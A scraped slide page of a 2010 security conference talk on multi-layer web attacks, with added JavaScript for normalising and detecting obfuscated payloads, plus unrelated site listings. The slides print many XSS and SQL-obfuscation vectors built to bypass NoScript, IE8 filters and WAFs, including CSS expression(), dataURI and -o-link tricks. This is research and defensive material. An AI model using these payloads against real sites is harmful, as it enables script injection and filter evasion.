The Presence and Future of Web Attacks
Multi-Layer Attacks, XSSQLI+ and HTML5

A presentation by Mario Heiderich for CONFidence 2010, Krakow
WARNING
This talk will be technical, chaotic and|or hurt
Intro

Mario Heiderich
@0x6D6172696F

    Based in Cologne
    CTO for Business IN Inc - working on workube.com
    Independent Security Researcher
    PHPIDS and something we will see later on
Why this talk?

    What happened to web application security?
    Always the same... so 2002, right?
        XSS, SQL injection, auth and path traversal
    We have amazing things now!
        NoScript, the IE8 and Chromium XSS filters and CSP
    Users must be safer than ever!

    But didn't the web change?
    Wasn't there HTML5 and next generation browsers?
Oh wait - developers!

    Web app development frameworks help
        Building applications faster
        Pre-implemented SQLi and XSS protection
        Secure forms with complex CSRF tokens
        Webroot contains webroot-only files

    Weaknesses regarding JavaScript generation
        Client side logic mostly built manually
        Different templates for browsers, mobile devices, feeds
        Offline mode, client side validation, DOM access
User Agents on steroids

    Chrome 5 and Opera 10.5 ship client side databases
    IE9 is coming soon with more standards conformity
    Integrated security mechanisms
    The death of eval()

    A fat client dynasty is coming up
    Who needs a server anyway if clients do all the work
    And store their data in "the cloud"

    Bye bye SQL - say hello to NoSQL?
Web applications are changing

    And so are the attacks against them
    If the attack happens on and against the client
    Of what use will a server side IDS / WAF solution be?

    Today we can have a little preview of that scenario
    One question might be...
    How will protective mechanisms react to multi-layer attacks?
Multi-layer what?

    What about utilizing the DBMS to generate an XSS attack?

    NoScript detects most XSS attacks without problems
    Circumvention has become very difficult
    Thanks to Giorgio Maone and the NoScript user base. And me :P

    Let's have a look at my last one (disclosed via SSD - fixed in 1.9.9.48)
    Aren't dataURIs the sweetest thing?

    <a href="d&#097t&#x0061: . &#x2c &#x25;3c s cri &#x00D; pt % 3 e al\u0065rt(1)%3c /s &#x43 RI &#x009 P t>"
Difficult!

    We can probably agree that it's not as easy anymore
    Same thing for the IE8 XSS filter
    Or implementations of toStaticHTML()

    Most quirky JavaScript encoding techniques are documented
    Not too many user agent specific surprises anymore

    Help from another layer would be appreciated
    Let's have a look at a "classic webapp" example
Imagine the DBMS helps

    Hypothesis
        A verbose SQL injection vulnerability is always at least an "unfilterable" XSS
    Verification
        Just make use of the obfuscation possibilities the DBMS provides

    SELECT 0x3C7363726970743E616C6572742831293C2F7363726970743E

    SELECT UpdateXML(concat(0x3c,'script',0x3e,'alert(1)',0x3c,'/script',0x3e), '/x', 0);

    SELECT/**/'<sc'"rip"'t>al'"er"'t(1)'"</sc"'ript>'

    All three statements return the string <script>alert(1)</script>, while the request that carries them never contains it (UpdateXML() hands back its first argument unchanged when the XPath expression matches nothing)
MySQL and PostgreSQL

    MySQL only ships two basic XML functions
        UpdateXML() and ExtractValue()
    PostgreSQL has far more advanced XML support

    SELECT xmlelement(name img, xmlattributes(1 AS src, 'alert(1)' AS onerror))

    SELECT xmlforest(loWER('\x41'||'lert(1)') AS script);

    (the \x41 escape inside a plain string literal relies on standard_conforming_strings being off, which was the default before PostgreSQL 9.1)

    And my favorite

    SELECT xpath('//text()', '<x:x>&#x3c;img\x20src=x onerror=alert(1);&#x2f;&#x2f;</x:x>', ARRAY[ARRAY['x', '']]);
SQL Injection and XSS

    There are more intersections for XSS and SQLi
    "Remember" the client side databases?
    And the short-lived Google Gears?
    HTML5 and W3C Offline Web Applications 1.0 give us

    window.openDatabase()

        SQL execution on the user agent
        Currently supported by Chrome and Opera
        Usually implemented using SQLite
Code please

<script type="text/javascript">
openDatabase('',1,1,0).transaction(function($){
    $.executeSql(
        'SELECT "\x61lert(1\u0029"', [], function($,results){
            for(i in results.rows.item(0))
                eval(results.rows.item(0)[i])
        })
})
</script>

    Selects the string "alert(1)" (the \x61 and \u0029 escapes are resolved by the JavaScript engine, so the SQL engine only ever sees SELECT "alert(1)")
    And evaluates the result: the row has a single column, and its value is what gets passed to eval()
Short Roundup

    The browsers speak SQL now
    The server side DBMS can generate HTML and JavaScript
    We already outsmarted NoScript and the IE8 XSS filter
    Not really a fair game though

    Multi-layer attacks mean multi-layer obfuscation
    In future webapps the client side DBMS will generate our XSS payload

    But today we still have to trick the server side protection
    Bypass IDS and WAF with a trigger
Attackers like obfuscation

    And why wouldn't they - right?
    Obfuscation usually means concatenation
    And a bit of encoding spice
    But how to concatenate in SQL so no one will notice the attack?
    Which operator to choose?

    Everybody knows chr(), char() and double-pipe...
In MySQL - none at all

    MySQL doesn't need parentheses to concatenate
    And doesn't know the double-pipe operator (|| is a logical OR unless sql_mode contains PIPES_AS_CONCAT)
    Sorry mod_security...
    But luckily MySQL accepts concatenation via whitespace

        SELECT "a" "d" "m" "i" "n"
        SELECT'a'"d"'m'"i"'n'

    Or why not use the multi-byte behaviour of char(): every argument larger than 255 is emitted as several bytes (CHAR(256) is CHAR(1,0)), so x'70617373' comes out as "pass" and the binary literal as "word"

        SELECT concat( char( x'70617373', b'1110111011011110111001001100100'))
So again...

    We can bypass the server side protection mechanisms
    As well as client side tools
    No parentheses or special operators needed on MySQL

    We can also trick MySQL and the IDS with MySQL specific code: version comments are executed by the server but look like comments to a generic parser, and "--" only starts a comment for MySQL when it is followed by whitespace

        SELECT--/*!500005,*//*!400004,*//*!300003,*/
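As an added example (my own code, not from the slides and not PHPIDS), here is a small normaliser that undoes the MySQL tricks from the last few slides, so that a signature is matched against what the DBMS will evaluate rather than against the raw request bytes. The five payloads at the bottom are re-typed from the slides; the function names and the signature regex are assumptions of this example. It is a demonstration, not a full SQL tokenizer: comments or hex literals that sit inside a string literal are not special-cased.

```javascript
// Added example, not from the slides: normalise MySQL obfuscation so a
// signature sees what the server will evaluate. Handled: /*! */ version
// comments, /* */ comments, 0xHEX, x'HEX' and b'BIN' literals, CHAR() with
// multi-byte arguments, adjacent string literals and CONCAT() of literals.

// Decode a big-endian integer into one character per byte (0x3C73 -> "<s").
function bytesToString(n) {
  let out = "";
  for (let v = BigInt(n); v > 0n; v >>= 8n) {
    out = String.fromCharCode(Number(v & 0xffn)) + out;
  }
  return out;
}

// MySQL CHAR(): every argument is an integer and values above 255 expand to
// several bytes (CHAR(256) is CHAR(1,0)), so char(x'70617373') yields "pass".
function mysqlChar(args) {
  return args.map((a) => {
    a = a.trim();
    if (/^0x[0-9a-f]+$/i.test(a)) return bytesToString(BigInt(a));
    if (/^x'[0-9a-f]+'$/i.test(a)) return bytesToString(BigInt("0x" + a.slice(2, -1)));
    if (/^b'[01]+'$/i.test(a)) return bytesToString(BigInt("0b" + a.slice(2, -1)));
    if (/^\d+$/.test(a)) return bytesToString(BigInt(a));
    return a; // a column name or expression: leave it alone
  }).join("");
}

// One string literal; MySQL doubles a quote to escape it, so 'a''b' is one literal.
const LIT = "'(?:[^']|'')*'|\"(?:[^\"]|\"\")*\"";

// 'a' "d"'m' is one string for MySQL: join literals separated only by whitespace.
function mergeAdjacentLiterals(sql) {
  const re = new RegExp(LIT, "g");
  let out = "", last = 0, run = null, runEnd = 0;
  for (const m of sql.matchAll(re)) {
    const q = m[0][0];
    const body = m[0].slice(1, -1).split(q + q).join(q);
    if (run !== null && /^\s*$/.test(sql.slice(runEnd, m.index))) {
      run += body;
    } else {
      if (run !== null) out += "'" + run.replace(/'/g, "''") + "'";
      out += sql.slice(last, m.index);
      run = body;
    }
    runEnd = last = m.index + m[0].length;
  }
  if (run !== null) out += "'" + run.replace(/'/g, "''") + "'";
  return out + sql.slice(last);
}

// CONCAT('<','script','>') of nothing but literals is just one literal.
function foldConcat(sql) {
  const re = new RegExp("\\bconcat\\(\\s*('(?:[^']|'')*'(?:\\s*,\\s*'(?:[^']|'')*')*)\\s*\\)", "gi");
  return sql.replace(re, (_, args) => {
    const parts = [...args.matchAll(/'((?:[^']|'')*)'/g)].map((m) => m[1].split("''").join("'"));
    return "'" + parts.join("").replace(/'/g, "''") + "'";
  });
}

function normalizeMySQL(sql) {
  let s = sql;
  // /*!50000 x */ runs on MySQL >= 5.0.0 and /*! x */ unconditionally: keep x.
  s = s.replace(/\/\*!(?:\d{5})?([\s\S]*?)\*\//g, "$1");
  // Plain comments are whitespace to the parser. "--" only opens a comment
  // when followed by whitespace, so SELECT--/*!...*/ is not commented out.
  s = s.replace(/\/\*[\s\S]*?\*\//g, " ");
  // CHAR(...) with literal arguments becomes a string literal.
  s = s.replace(/\bchar\(\s*([^()]*)\)/gi, (_, inner) => "'" + mysqlChar(inner.split(",")) + "'");
  // Hex and binary literals are strings in a string context.
  s = s.replace(/\b0x([0-9a-f]+)\b/gi, (_, h) => "'" + bytesToString(BigInt("0x" + h)) + "'");
  s = s.replace(/\bx'([0-9a-f]+)'/gi, (_, h) => "'" + bytesToString(BigInt("0x" + h)) + "'");
  s = s.replace(/\bb'([01]+)'/gi, (_, b) => "'" + bytesToString(BigInt("0b" + b)) + "'");
  s = foldConcat(mergeAdjacentLiterals(s));
  return s.replace(/\s+/g, " ").trim();
}

// A deliberately naive signature, applied before and after normalisation.
function looksLikeXSS(sql) {
  return /<\s*script|onerror\s*=/i.test(sql);
}

// Payloads re-typed from the slides above.
const PAYLOADS = [
  "SELECT 0x3C7363726970743E616C6572742831293C2F7363726970743E",
  "SELECT UpdateXML(concat( 0x3c,'script',0x3e,'alert(1)',0x3c,'/script',0x3e), '/x', 0);",
  "SELECT/**/'<sc'\"rip\"'t>al'\"er\"'t(1)'\"</sc\"'ript>'",
  "SELECT concat( char( x'70617373', b'1110111011011110111001001100100'))",
  "SELECT--/*!500005,*//*!400004,*//*!300003,*/",
];

for (const p of PAYLOADS) {
  console.log(looksLikeXSS(p), looksLikeXSS(normalizeMySQL(p)), normalizeMySQL(p));
}
```

The point of the loop at the end: the first column (signature on the raw request) is false for every XSS payload, the second column (signature on the normalised statement) is true for all of them, and the last payload normalises to SELECT--5,4,3, because the version comments are code for MySQL.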
Back to the user agent

    But what if no server side DBMS is involved in the attack?
    What if the client side database is being targeted?

    We still need to execute some JavaScript, bypassing both the server side IDS and the client side security mechanisms

    Let's have a look at some freaky examples
Remember dataURIs?

    The whole requested resource embedded in the URI
    DataURIs work smoothly on Firefox, Opera and Chrome
    But IE8 and 9 have problems
    Some say the minimal dataURI support was just for ACID 2
People say...

    ...it's not possible to execute JavaScript via dataURI on IE

    Do we agree on that?
    No we don't!

    <style>
    @import "data:,*%7bx:expression(write(2))%7d";
    </style>

    <link rel="Stylesheet" href="data:,*%7bx:expression(write(4))%7d">
And there's more

    CSS expression() is believed to be dead on IE8

    But it isn't
    It's only disabled in standards mode
    In case a recognized DOCTYPE is present
    The new HTML5 doctype isn't

    So this works:

    <!docytpe html>
    <div style="background:url('abc', x!=x=expression(write(2));)">
And even worse...

    HTML5 forces user agents to be more tolerant again
    New tags, new attributes, new parsing rules
    And tons of new features like the mentioned openDatabase()

    Some nifty examples from the future

    <video/poster=javascript:alert(1)// Opera 10.5+
    <style>@import javascript:alert(1); // IE9 (!)
Closing tags + free 0day

    Another weird artifact was reported for IE6 some years ago
    It's attributes in closing HTML tags
    Believed to be dead... but
    This still works on all IEs

    <td>phoobar</td style=expression(write(1))>

    And what about this?

    <style>*{background:url(foo!!-=expression(write(1));</style>
Opera CSS XSS

    Since Mozilla fixed the dataURI and cross domain problems with -moz-binding, IE was believed to be unique
    Unique regarding JavaScript execution via CSS
    But Opera ships an artifact too

    <style>*{-o-link:'javascript:alert(1)';-o-link-source:current}</style>
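As an added example (my own code, not from the slides), here are the decoding layers a server-side filter has to peel off before it can see the triggers from the dataURI, expression(), closing-tag and -o-link slides. The samples marked "from the slides" are copied from them; the anchor sample and the behavior sample are constructed here in the same style (the behavior one reuses the entity-then-CSS-escape layering that the markup ghoul on a later slide spells "behavior" with), and the signature names are assumptions of this example. Decoding is repeated until the string stops changing, because the layers nest: an HTML entity can yield a backslash that then starts a CSS escape.

```javascript
// Added example, not from the slides: peel HTML entities, %XX, JavaScript
// escapes and CSS escapes in turn, then match signatures on the result.

// HTML character references, with or without the trailing semicolon:
// browsers accept d&#097t&#x0061: as "data:".
function decodeHtmlEntities(s) {
  return s
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d{1,7});?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// %XX in URLs, including data: URIs.
function decodePercent(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// JavaScript \uXXXX and \xXX escapes: al\u0065rt is alert to the JS engine.
function decodeJsEscapes(s) {
  return s
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// CSS escapes: a backslash, one to six hex digits and one optional whitespace
// character, so b\65h\0061vior is "behavior" to the CSS parser.
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-f]{1,6})\s?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)));
}

// Peel the layers until nothing changes, then drop the control characters
// IE tolerates inside tag and attribute names (the &#x00D; and &#x009 tricks).
function decodeLayers(input, maxRounds = 5) {
  let s = input;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeCssEscapes(decodeJsEscapes(decodePercent(decodeHtmlEntities(s))));
    if (next === s) break;
    s = next;
  }
  return s.replace(/[\r\n\t\0]/g, "");
}

// Signatures for the triggers discussed on the slides (names are my own).
const SIGNATURES = [
  ["script tag", /<\s*script/i],
  ["javascript: URL", /javascript\s*:/i],
  ["CSS expression()", /expression\s*\(/i],
  ["IE behavior / HTML+TIME", /behavior\s*:/i],
  ["Opera -o-link", /-o-link\s*:/i],
  ["attribute in closing tag", /<\/[a-z][a-z0-9]*\s+[^>]*=/i],
];

function scan(html) {
  const decoded = decodeLayers(html);
  const hits = SIGNATURES.filter(([, re]) => re.test(decoded)).map(([name]) => name);
  return { decoded, hits };
}

const SAMPLES = {
  // Constructed here in the style of the NoScript dataURI vector: entities
  // without semicolons, an entity-encoded percent sign, a CR inside the tag
  // name and a \u escape inside the JavaScript.
  dataUriAnchor: '<a href="d&#097t&#x0061:,&#x25;3cs&#x43;ri&#x00D;pt%3eal\\u0065rt(1)%3c/script%3e">',
  // From the slides.
  cssDataUri: '<style>@import "data:,*%7bx:expression(write(2))%7d";</style>',
  closingTag: '<td>phoobar</td style=expression(write(1))>',
  video: '<video/poster=javascript:alert(1)//',
  operaLink: "<style>*{-o-link:'javascript:alert(1)';-o-link-source:current}</style>",
  // Constructed: "behavior" written as b\65h\0061vIor with both backslashes
  // entity-encoded, so two layers have to be removed before it is readable.
  haroldStyle: '<div style="b&#x5c;65h&#x5c;0061vIor:url(#default#time2)">',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  const rawHits = SIGNATURES.filter(([, re]) => re.test(html)).map(([n]) => n);
  const { decoded, hits } = scan(html);
  console.log(name, "raw:", rawHits, "decoded:", hits, "->", decoded);
}
```

Running it shows the asymmetry the slides are about: the raw anchor sample and the behavior sample match nothing, while after decoding they read as a script tag and a behavior: property; the closing-tag and video samples are caught either way, which is why a filter that only normalises is still not enough against the parser quirks themselves.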
Now we have...

    Server side SQL helping to circumvent client side XSS filters
    Effective SQL obfuscation circumventing WAF and IDS
    "Obfuscation mash-ups" using several layers
    Quirky HTML triggers to execute the JS

    Sounds like only one player is missing

    Even more freaky markup obfuscation! Awesome! Now breathe..
Meet Harold the markup ghoul

This is Harold:
                   1;--<?f><l ₩ :!!:x
                   /style=`b&#x5c;65h0061vIor/ĸ
                   :url(#def&#x61ult#time2)ö/';'` ₩ /onb
                   egin=
                   &#x5bµ=u00&#054;1le&#114t&#40&#x31)&#
                   x5d&#x2f/&#xyŧ>




    It's completely legitimate to call me a madman now and say this is never gonna work

    So - demo time: http://heideri.ch/jso/what???

What... what is this?

    It's a piece of markup – obfuscated to the max
    Working on IE only – but all versions from 5 to 9
    Based on the HTML+TIME API (What? Stuff like that still exists?)
    Does your WAF know what to do with it?

    Overall about 12-13 obfuscation steps
    Buy me a beer later on and I will give you a full explanation :D
Round Up

    We are not living in "web app = CRUD application" times anymore
    Modern webapps accept input from many channels
    User input via HTTP is just one of them
    API calls, RPC, DOM, drag & drop, file metadata & EXIF...

    WAF/IDS as well as pentesters need to look into HTML5
    New application structures and design patterns must be understood

    Client and server versus rich client and cloud
    SQLite and NVP versus RDBMS
    Massive client diversity via mobile devices
Expectations and tasks

    Fewer basic and reflected XSS
    More out-of-band attacks and heavy obfuscation
    We didn't even cover Flash and PDF
    More JSON and E4X hijacking
    SVG based attacks and rogue multimedia objects

    Don't ignore the user agent
    Understand client side obfuscation and multi-layer obfuscation
    Don't trust filters. Ever.
    We broke HTMLPurifier and most other markup filters some days ago with one single vector

    And don't trust the cloud – it's a business model and not your buddy :D
So what can I do?

    Help with research and participation!
    Communication and disclosure
    For good!
    But how?

The Ultimate Cheatsheet

    http://heideri.ch/jso

Ping us!

    Add new vectors
    Get a channel to speak to vendors
    Most are more responsive than one might think
    Use it for..
        Your own scanner software
        Your own local version
        Whatever you want!
        Open API in JSON
        Multiple languages
        Flexible payload
        You need more? Tell us!

Do what now?

    Go here!
        http://code.google.com/p/html5security/
Questions & Comments

    Thanks very much for listening!
    Wait - no goodies this time? Meh!!1

Yaaaaaaay! Goodies!

    Did you know Firefox has a DOM object called crypto?
    PKI meets JavaScript
    And another eval() for free!

    crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use');

    The fifth argument is a string of JavaScript that Firefox evaluates once the key pair has been generated, which is why 'alert(1)' fires

Whatever it takes - Fixing SQLIA and XSS in the process
 
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか  〜技術選びで注目すべきポイントとは〜Web開発の技術選び、 好き嫌いでやってませんか  〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
 
Original slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkOriginal slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talk
 
Real World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case StudyReal World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case Study
 

Kürzlich hochgeladen

Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...amber724300
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
Accelerating Enterprise Software Engineering with Platformless
Accelerating Enterprise Software Engineering with PlatformlessAccelerating Enterprise Software Engineering with Platformless
Accelerating Enterprise Software Engineering with PlatformlessWSO2
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Nikki Chapple
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...Karmanjay Verma
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 

Kürzlich hochgeladen (20)

Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
Accelerating Enterprise Software Engineering with Platformless
Accelerating Enterprise Software Engineering with PlatformlessAccelerating Enterprise Software Engineering with Platformless
Accelerating Enterprise Software Engineering with Platformless
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 

Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5

  • 1. The Presence and Future of Web Attacks
    Multi-Layer Attacks, XSSQLI+ and HTML5
    A presentation by Mario Heiderich for CONFidence 2010, Krakow
  • 2. WARNING
    This talk will be technical, chaotic and|or hurt
  • 3. Intro
    Mario Heiderich @0x6D6172696F
    - Based in Cologne
    - CTO for Business IN Inc - working on workube.com
    - Independent Security Researcher
    - PHPIDS and something we will see later on
  • 4. Why this talk?
    - What happened to web application security?
    - Always the same... so 2002 right?
    - XSS, SQL Injections, Auth and path traversal
    - We have amazing things now!
    - NoScript, the IE8 and Chromium XSS filter and CSP
    - Users must be safer than ever!
    - But didn't the web change?
    - Wasn't there HTML5 and next generation browsers?
  • 5. Oh wait - developers!
    - Web app development frameworks help
    - Building applications faster
    - Pre-implemented SQLI and XSS protection
    - Secure forms with complex CSRF tokens
    - Webroot contains webroot only files
    - Weaknesses regarding JavaScript generation
    - Client side logic mostly built manually
    - Different templates for browsers, mobile devices, feeds
    - Offline mode, client side validation, DOM access
  • 6. User Agents on steroids
    - Chrome 5 and Opera 10.5 ship client side databases
    - IE9 is coming soon with more standards conformity
    - Integrated security mechanisms
    - The death of eval()
    - A fat client dynasty is coming up
    - Who needs a server anyway if clients do all the work
    - And store their data in „the cloud“
    - Bye bye SQL - say hello to NoSQL?
  • 7. Web applications are changing
    - And so are the attacks against them
    - If the attack happens on and against the client
    - Of what use will a server side IDS / WAF solution be?
    - Today we can have a little preview for that scenario
    - One question might be...
    - How will protective mechanisms react on multi-layer attacks?
  • 8. Multi-layer what?
    - What about utilizing the DBMS to generate an XSS attack
    - NoScript detects most XSS attacks without problems
    - Circumvention has become very difficult
    - Thanks to Giorgio Maone and the NoScript user base. And me :P
    - Let's have a look at my last one (disclosed via SSD - fixed in 1.9.9.48)
    - Aren't dataURIs the sweetest thing?
    <a href="d&#097t&#x0061: . &#x2c &#x25;  3  c s cri &#x00D; pt % 3 e al\u0065rt(1)%3c  /s &#x43 RI &#x009 P t>"
  • 9. Difficult!
    - We can probably agree that it's not as easy anymore
    - Same thing for the IE8 XSS filter
    - Or implementations of toStaticHTML()
    - Most quirky JavaScript encoding techniques are documented
    - Not too many user agent specific surprises anymore
    - Help from another layer would be appreciated
    - Let's have a look at a "classic webapp" example
  • 10. Imagine the DBMS helps
    - Hypothesis: A verbose SQL Injection vulnerability is always at least an "unfilterable" XSS
    - Verification: Just make use of the obfuscation possibilities the DBMS provides
    SELECT 0x3C7363726970743E616C6572742831293C2F7363726970743E
    SELECT UpdateXML(concat( 0x3c,'script',0x3e,'alert(1)',0x3c,'/ script',0x3e), '/x', 0);
    SELECT/**/'<sc'"rip"'t>al'"er"'t(1)'"</sc"'ript>'
  • 11. MySQL and PostgreSQL
